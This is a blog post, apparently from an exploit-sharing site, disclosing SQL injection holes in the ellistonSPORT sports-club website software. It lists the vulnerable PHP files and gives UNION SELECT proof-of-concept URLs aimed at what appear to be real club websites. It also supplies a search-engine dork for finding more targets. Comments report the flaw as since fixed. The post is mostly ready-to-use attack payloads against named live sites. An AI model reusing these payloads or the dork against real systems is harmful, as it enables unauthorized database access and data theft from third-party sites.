LFI to RCE via access_log injection

ellistonSPORT Multiple SQL Injection Vuln

[o] ellistonSPORT Multiple SQL Injection Vulnerability
Software : ellistonSPORT
Vendor : http://ellistonsport.com/
Demo : http://demo.ellistonsport.com/index.php
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/

[o] Description
ellistonSPORT is a leading online service providing
professionally designed, easy to update websites for sports clubs and
teams around the world.


[o] Vulnerable file
showPlayer.php
showPage.php
showNews.php

[o] Exploit
http://localhost/[path]/showPlayer.php?id=[SQL]
http://localhost/[path]/showPage.php?id=[SQL]
http://localhost/[path]/showNews.php?id=[SQL]

[o] Proof of Concept
http://garndiffaithrfc.com/showPlayer.php?id=101+AND+1=2+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,database()--
http://www.rbscrusaders.com/showPage.php?id=10+AND+1=2+UNION+SELECT+1,version(),database(),4--
http://www.romafc.co.uk/showNews.php?id=363+AND+1=2+UNION+SELECT+1,version(),database(),4,5,6,7--

[o] Dork
"Powered by ellistonSPORT"



[o] Notes
this is a private script and all target are in one IP address.


Comments

Anonymous said…
It looks like it has been fixed now.
evilc0de said…
yeah it seems like they already fix that vuln. i have tell the vendor before i post it here but there is no "thank you" from them.. whatever!! lol